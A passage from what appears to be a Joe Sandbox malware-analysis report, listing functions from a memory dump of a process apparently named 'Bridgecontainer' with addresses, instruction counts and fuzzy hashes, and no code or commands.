Instruction ID: 7a5040304c1ee3c1bd764877e402947be76c4df7df05246615bffc1300673400
Opcode Fuzzy Hash: 2939d4bdb43d7ff41b710166f4a261868904c2ea94beaa989ed883a7cf78cc2a
Instruction Fuzzy Hash: E2C13A71D19A5A9FEB98EB68C8657B8B7B1FF19341F0400BAD00DD72D2CB386984CB45

Function 00007FF848F1AFE8 Relevance: .3, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40c32000be2c7749e79fff53ed9c89c0e29b504d8c1ab1065d9785d351d36597
Instruction ID: 84a1fe055b15a0fe0bbb9c7cf3a3ef4fc44be1b050c59af39e3d526380fd807f
Opcode Fuzzy Hash: 40c32000be2c7749e79fff53ed9c89c0e29b504d8c1ab1065d9785d351d36597
Instruction Fuzzy Hash: 90B18B3091D64E8FEBA5EF28D8596BA7BF0FF18341F0005BAD809D7192EB39A554CB44

Function 00007FF848F2BF70 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 926bc27651af2b7bdeaf52626157fd4304faf65693d4794d6794ea6de1c60a38
Instruction ID: e97131a7e8f5971fdb58b2f98a1680b88f5c398cb09c4d69ea78e415e6dacadb
Opcode Fuzzy Hash: 926bc27651af2b7bdeaf52626157fd4304faf65693d4794d6794ea6de1c60a38
Instruction Fuzzy Hash: 50C14730E1961D8FEB50EBA8D8597AEB7B1FF08300F1041BAD409E7292DF396985CB55

Function 00007FF848F2BFE0 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 301f8ab91444e1723dc82b02b021052b693333e71f6b6aa64d63da03d56fdfe7
Instruction ID: 29b5a4158c61bcd9fa558570629a477ef9ebba45e76a7502b4e9d59c8b038701
Opcode Fuzzy Hash: 301f8ab91444e1723dc82b02b021052b693333e71f6b6aa64d63da03d56fdfe7
Instruction Fuzzy Hash: 9EC13830E1961D8FEB44EBA8D8597AEB7B1FF48300F1041BAD009E7292DF396985CB55

Function 00007FF848F1C0BA Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41657df748299e2a5bf6debe75920dacbccbd24174edbe420efe70d67c1e87c2
Instruction ID: 5034daf674d2bb9354801a043c4e95e096d2b72b5dc6790cd6422ffc6bfc5fc1
Opcode Fuzzy Hash: 41657df748299e2a5bf6debe75920dacbccbd24174edbe420efe70d67c1e87c2
Instruction Fuzzy Hash: 44B14A30D1DA9E8FEB95EB6888592FDBBB0FF19340F4401BAD409D71D2EB3869448B45

Function 00007FF848F12155 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4fbf9d4634e8bc7d53bf962f7098e6c0b1f9315169a444eb3a1e78108a19718
Instruction ID: 6da2fc51ea2c56019d4d83805e2b81a53909f2dd303f5f475360a804dce60332
Opcode Fuzzy Hash: f4fbf9d4634e8bc7d53bf962f7098e6c0b1f9315169a444eb3a1e78108a19718
Instruction Fuzzy Hash: A2A11F31D0C69A8FEBA9EBA488556BCB7A1FF46380F0401BAD40DD72D2DF386C458B54

Function 00007FF848F1DB08 Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 818e874e12128aa1e2afa906c28c247052d0f7766102b6e512c8e5bf24fefef6
Instruction ID: f4f0b4d4436ca7a92c9708522f3830e6656c479c3207ee545b2f41f3a53566a3
Opcode Fuzzy Hash: 818e874e12128aa1e2afa906c28c247052d0f7766102b6e512c8e5bf24fefef6
Instruction Fuzzy Hash: 5EB12931D19A5A9FEB98EB68D8557B8B7B1FF58340F0400B9D00EE32D6CB386984CB05

Function 00007FF848F1C128 Relevance: .3, Instructions: 290COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a99ab4094b2894d5dc6256c780bf9b81232807f3d46bf01f949140877332d434
Instruction ID: 110750001644badc35a8fef05b89cac228135f3617dd93e04bdd64b877fc2aac
Opcode Fuzzy Hash: a99ab4094b2894d5dc6256c780bf9b81232807f3d46bf01f949140877332d434
Instruction Fuzzy Hash: 1CA14A30D1DA5E8FEB94EB6888596FDBBB1FF59340F4401BAD409D32D2EB3869448B44

Function 00007FF848F116F8 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d13970c4f0c350d4aa96bc1578a6e16c48d1f445092c665a809964f2f6c5a0b
Instruction ID: a7f0385c844868ec08fbfe6ce7efb80b5f2ea530ec9f8f516830b1e0cd1e1b3d
Opcode Fuzzy Hash: 3d13970c4f0c350d4aa96bc1578a6e16c48d1f445092c665a809964f2f6c5a0b
Instruction Fuzzy Hash: 6481BC31A1CA498FDB98EF1C98556A977E2FF99740F1445BAE44EC32C2CF24AC42C785

Function 00007FF848F1B035 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f5cb2e93226bbb65cb2d0c21168aec5abf45ecfc61738773ec0732c7f1662d
Instruction ID: cedb13a5153cfabc3b668b0065c27530ad5bc07eea6693fd16d4e5e74186848d
Opcode Fuzzy Hash: d1f5cb2e93226bbb65cb2d0c21168aec5abf45ecfc61738773ec0732c7f1662d
Instruction Fuzzy Hash: 7A91AF3191D68E8FEBA5EF28D8192FA7BF0FF15341F0405BAD808C2192EB79A554CB45

Function 00007FF848F1CC40 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e81b822d2f6cd5c3a21bfa4b30f7f3d1f0367df14b95fc0a5a1f23a0183b90a
Instruction ID: 5710f31fb29d72a4b1c80d65f66ce1c097ae2b398494cac66eb957f78c647b80
Opcode Fuzzy Hash: 6e81b822d2f6cd5c3a21bfa4b30f7f3d1f0367df14b95fc0a5a1f23a0183b90a
Instruction Fuzzy Hash: 85A17C34E1960D8FEB44EB68D859AAEBBF1FF58300F10017AD009D7292EF39A941CB44

Function 00007FF848F130AC Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92316d58170262bf5a6851239b0255cb27866384679ba892f4cd842e65c06b6d
Instruction ID: 3efd85d06071746b68bae51042c94f9583ef2cba5d123fc0cc36589e57a89515
Opcode Fuzzy Hash: 92316d58170262bf5a6851239b0255cb27866384679ba892f4cd842e65c06b6d
Instruction Fuzzy Hash: 29A16730D0D6898FEB55EBA8C8996EDBBF0EF59340F1441BAD049D72D2DB38A944CB14

Function 00007FF848F2EA90 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef6774b416d3fcbf7022785d85423798e8756629fc1df793ad4272040e994234
Instruction ID: 1050b0217eb2d3b1b40c9ed047973de36ee3cb609d59e6d07b8224974885f4cc
Opcode Fuzzy Hash: ef6774b416d3fcbf7022785d85423798e8756629fc1df793ad4272040e994234
Instruction Fuzzy Hash: 66A17C30D1D68E8FEB95EF6498692BA7BB0FF19301F1404BBD819C6192EB396544CB41

Function 00007FF848F274F0 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c562628badb9c078e1059a231e73e23e5be03efc6365e486d1e54e103c7c4f
Instruction ID: b2f3a00dfdcf79e22d1486f169bba6a808a0237f1c56d51d6814a5398d3fe8ca
Opcode Fuzzy Hash: d6c562628badb9c078e1059a231e73e23e5be03efc6365e486d1e54e103c7c4f
Instruction Fuzzy Hash: 76819D3091DA4E8FEB91FB2898596FABBF0FF19340F0408BAD409C7092EB39A544C755

Function 00007FF848F11C58 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 838458351e5826f2a7913d7588715a20efd7a6a99fa961accf7e19ac576336a5
Instruction ID: 1aef5c7090e7136530940995f3a44ecbdc3a5c801eb5ba5fbbc41fb43482eb6d
Opcode Fuzzy Hash: 838458351e5826f2a7913d7588715a20efd7a6a99fa961accf7e19ac576336a5
Instruction Fuzzy Hash: 0C81BF30A1CA8A8FDB59EF2888555BA77E1FF99340F1445BED449C32C2DB34AC82C785

Function 00007FF848F11CC8 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efc4904fc8631f91bf3e43d49eed4dfdff2bd7f095c6634044f679de1f274adc
Instruction ID: 1cd73fde8fdb7f82d9cb531f2123e42020e44454d9048d26fb672d8f8b4fae85
Opcode Fuzzy Hash: efc4904fc8631f91bf3e43d49eed4dfdff2bd7f095c6634044f679de1f274adc
Instruction Fuzzy Hash: 6461AD31A0CA8A8FDB49EF1888555BA77E2FF98340F14457ED44AC32C2CB35AC82C785

Function 00007FF848F105D0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e9696c8393357e84aa91a3f55c1f52751b5288b88f74b09a0a03fefec4a25b8
Instruction ID: 02ab9fad270274cd89334770720b6be173070ffb654314f8e6a73ea0d31909d1
Opcode Fuzzy Hash: 1e9696c8393357e84aa91a3f55c1f52751b5288b88f74b09a0a03fefec4a25b8
Instruction Fuzzy Hash: A8619C30A1CA8A8FDB49EF1888555BA77A2FF98344F14457ED44AC7282CB34AC82C785

Function 00007FF848F12A50 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6e68a711239f18784b6a2e6857193f7220ea77c6f63ca0c3f4124637c4c8be9
Instruction ID: 88c71a9d8a5c3d37e9ea9c4ddefd7e8976a5a54dc74fb19f0ee0938aacd30886
Opcode Fuzzy Hash: c6e68a711239f18784b6a2e6857193f7220ea77c6f63ca0c3f4124637c4c8be9
Instruction Fuzzy Hash: DC71AC3090DA8A8FEB95EB2498682F97BE0FF19350F2405BAC409C71D2DB79A544CB49

Function 00007FF848F2F9F0 Relevance: .2, Instructions: 216COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3db16ae50bc0f3e6bce63735342eb753b4c31879be54a764640b9c2eb2843e32
Instruction ID: 458091ec2badf9d41b740ab4a87c17cfd968df600a89535c419221f78266c909
Opcode Fuzzy Hash: 3db16ae50bc0f3e6bce63735342eb753b4c31879be54a764640b9c2eb2843e32
Instruction Fuzzy Hash: 2871C370D1C91E8FEBA4EBA8E495ABDB7B1EF58340F50017AD40DE32C1CB3569818B58

Function 00007FF848F262F0 Relevance: .2, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad49b98bdec65f50562dc7f39ca5006a6e03a210b25b44c996daf241c3196c65
Instruction ID: de49dd64c281743bc365e1de1256510aebddfec2bc0e0de556e86f3fc9fe2432
Opcode Fuzzy Hash: ad49b98bdec65f50562dc7f39ca5006a6e03a210b25b44c996daf241c3196c65
Instruction Fuzzy Hash: 7B814770D0C65A8FEBA9AB64A8597B9B6B0FF15340F0041BAD40DD22D2DF396984CB16

Function 00007FF848F1C229 Relevance: .2, Instructions: 209COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d0b329d4462636a9ba3bfeed72b89e0f02457cf5c44fdc6252e49695e231112
Instruction ID: 79cd52226a7438fd2916b4f7f4a27287f3fe5d01a0a04ec17b3b36c389bb01b1
Opcode Fuzzy Hash: 5d0b329d4462636a9ba3bfeed72b89e0f02457cf5c44fdc6252e49695e231112
Instruction Fuzzy Hash: 4061F470D1CA5E8FEB94EBA898556FDBBA1FF59340F40017AD40DE3292EB3869448B44

Function 00007FF848F129F0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8de95c3fee4a8f9cacefee70292fcbdcac28e1d8af096402bcdd6e630468985c
Instruction ID: 8cb374cbbc28cccbd4811d9b4ebdb110f097e13ebc63b42a5481d519d0df55c0
Opcode Fuzzy Hash: 8de95c3fee4a8f9cacefee70292fcbdcac28e1d8af096402bcdd6e630468985c
Instruction Fuzzy Hash: 9461E43191E78A8FE751BB78A8252FA7BB0FF06364F1405BBD448CA0D3DB295448C759

Function 00007FF848F130E0 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecbb9325f06b0fffb1c90d29c4f9be5b184204173ada5dacd9f9cffb3600d7b9
Instruction ID: 47b9281048d1e5b3337b4b2c9ba4d5f2c333e7954e2b4a954898b8d6807dc5db
Opcode Fuzzy Hash: ecbb9325f06b0fffb1c90d29c4f9be5b184204173ada5dacd9f9cffb3600d7b9
Instruction Fuzzy Hash: 78714970D1D65A8FEB54EBA8C8956EDBBF0EF58340F50007AD049E62D2DF38A944CB18

Function 00007FF848F1287D Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2de3907a450e129d4ba12643bfc137575a1197b7af908635eb281efcfbdf3593
Instruction ID: fd1f14d6a746b92c92b1be34737947bfb5a1e435aab3ab37e5cc557f6a04983e
Opcode Fuzzy Hash: 2de3907a450e129d4ba12643bfc137575a1197b7af908635eb281efcfbdf3593
Instruction Fuzzy Hash: 0251F63661A6668FD301BB7CE4855E937B0FF85365F084677D088CE093DF2CA84987A9

Function 00007FF848F1C2A8 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87955c5be723f393ca97c08321f9b01dd35bf5ca50765db24f85ae37752d15a7
Instruction ID: 8b0f4f3e74cfe5664cee24afb199bb9eead667a23d555e3ee8f964c9f2bc642d
Opcode Fuzzy Hash: 87955c5be723f393ca97c08321f9b01dd35bf5ca50765db24f85ae37752d15a7
Instruction Fuzzy Hash: DD51D370E1CA1D8EEB94EBA894957FDBBA1FF59340F40017AD00DE3282EF246D419B44

Function 00007FF848F11D78 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5a9b8febd40126cf1842ef8b520673d06a18818a0e6a958ec0b5741daa0697a
Instruction ID: 7212ca1f8d73f0013701b5382a118cee600e72373b74487ca9f2e77575fc392b
Opcode Fuzzy Hash: c5a9b8febd40126cf1842ef8b520673d06a18818a0e6a958ec0b5741daa0697a
Instruction Fuzzy Hash: 1A419D31A18A594FDB48EF1888556BA73E2FBD8755F10467ED45AC3286CF30EC428785

Function 00007FF848F12E29 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c1c30f97b3a1b66f6e5555c561579b37bc8a62fb2bc624070b52e16f9f1ce0f
Instruction ID: d7cd91447ac394b8156c3844e72708a7c82b4caad270dcd283d7dafdd6ec1c56
Opcode Fuzzy Hash: 9c1c30f97b3a1b66f6e5555c561579b37bc8a62fb2bc624070b52e16f9f1ce0f
Instruction Fuzzy Hash: 12518C3095E68A8FE752FBB488582FA7BE0EF16350F0405BAD408C60D2EB78A944C755

Function 00007FF848F1CF28 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0119b47683638667c9a26a704ee504015544d548e6d62b02d93c7bee464e3cfa
Instruction ID: d387a9be6da45b2771b6f94cda849707be29100cfdc6c5ca8e4a1c7752e968af
Opcode Fuzzy Hash: 0119b47683638667c9a26a704ee504015544d548e6d62b02d93c7bee464e3cfa
Instruction Fuzzy Hash: 4A41CD31D1C64A9FEB68FB68E8156FEB7B0FF54390F04017AD00AD21C6EF2869058794

Function 00007FF848F124E8 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c278a538408c1865466eb4fc5ba128bacc8ae941ec0930b86fdc4ebb0caba26
Instruction ID: 789ea11425a8bdb7f5f9c47e332be6c1a5a34d6314524d01ab82a6cb75f0e52d
Opcode Fuzzy Hash: 4c278a538408c1865466eb4fc5ba128bacc8ae941ec0930b86fdc4ebb0caba26
Instruction Fuzzy Hash: DC31683280D54A4FE755EBA898814E6B7E0FF91360F0402BBD448CB0E2EB3CAD4687D5

Function 00007FF848F1CA55 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faf412373c9c5c35b80c6f97f5373f2845601e155b7cbfa63a7aa1e2e734be30
Instruction ID: 36593f53dd02c2deb9896b6940a8e30aba9a8031bb3dc900e81d398041cf432a
Opcode Fuzzy Hash: faf412373c9c5c35b80c6f97f5373f2845601e155b7cbfa63a7aa1e2e734be30
Instruction Fuzzy Hash: 9A315427B1E1269AE65277ADB8114E96724EF917F9F040377D24CCD0D3EA1D388642BC

Function 00007FF848F1CA48 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c587e8e93656895d4d888e8025db10e4e9b5ce2d282b18c81649922b783a96f3
Instruction ID: eb02cca40b7b1febbaa24e5520c65c0de561b93977164de741567321c1c18c50
Opcode Fuzzy Hash: c587e8e93656895d4d888e8025db10e4e9b5ce2d282b18c81649922b783a96f3
Instruction Fuzzy Hash: 33417F3081D68D8FDB96BF2488592F97BB0FF16301F4504BAD409C65E2DB386954C741

Function 00007FF848F1D6F9 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6abc2055cd6ef0eaecdc1a4ff31eee58f1b307ab4571c592766d1658be18109f
Instruction ID: 364141de796a8677b2918fb841216b402d27d2609229bbf3cb23db1fc4ebf514
Opcode Fuzzy Hash: 6abc2055cd6ef0eaecdc1a4ff31eee58f1b307ab4571c592766d1658be18109f
Instruction Fuzzy Hash: 07419F7181E7CA8FEB96BB2488292F97FB0EF06301F4504BBD848C64E2EB385954C741

Function 00007FF848F1CF30 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 013133bba4311c047b9bd730dbf7dcc80dce6ba4563ca25220244ef13854053a
Instruction ID: e9a26e560d5340d6c0b5175c760e5d0ae3ea0c7a69bc099f999c54d2eca6daad
Opcode Fuzzy Hash: 013133bba4311c047b9bd730dbf7dcc80dce6ba4563ca25220244ef13854053a
Instruction Fuzzy Hash: 6441CF3090DA4A9FEB99EF68986A2B97BA0FF29341F0404BED409C21D2DF3A6544C745

Function 00007FF848F126AD Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0641430cce6af209b8e1d57932a3c73e300614e5e8c719a0635251b4a2755ee2
Instruction ID: a528a7bfbc8fa7a7c53342b2ff8cbddfe6d42c02a1d33a49ba5091cc30bf1e14
Opcode Fuzzy Hash: 0641430cce6af209b8e1d57932a3c73e300614e5e8c719a0635251b4a2755ee2
Instruction Fuzzy Hash: 83316D3081E7CA8FEB56EBB488681AA7FA0FF16341F0945BBD448C64D2EB389954C751

Function 00007FF848F12EB8 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecaf52ebc41671577fad0f473381a093ee2f96e0781eb9ee87a13623adc7940f
Instruction ID: 1529c79a5c6bf8368467d15feb6c53e5382aefc0d6916f749e2970c1f76853ec
Opcode Fuzzy Hash: ecaf52ebc41671577fad0f473381a093ee2f96e0781eb9ee87a13623adc7940f
Instruction Fuzzy Hash: DA419E3191D68A8FE752FBB488192FA7BE0EF15350F0405BAD408C61D6EB78AA54C745

Function 00007FF848F10500 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff848f10000_Bridgecontainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd5821b9bccdbda9ce257a9979e63431952750106f47ff4f3e75667fe7b89c1e
Instruction ID: 6ef1dcc3e7e28abaaa37f150dcfd6ddff327d1aaab79010915d21b9e55341dbc
Opcode Fuzzy Hash: bd5821b9bccdbda9ce257a9979e63431952750106f47ff4f3e75667fe7b89c1e
Instruction Fuzzy Hash: 49419D3081D78E8FEB56EFB488182AA7BE0FF19341F0444BAD409C74E2EB38A954C701

Function 00007FF848F1CF1D Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4475970863.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

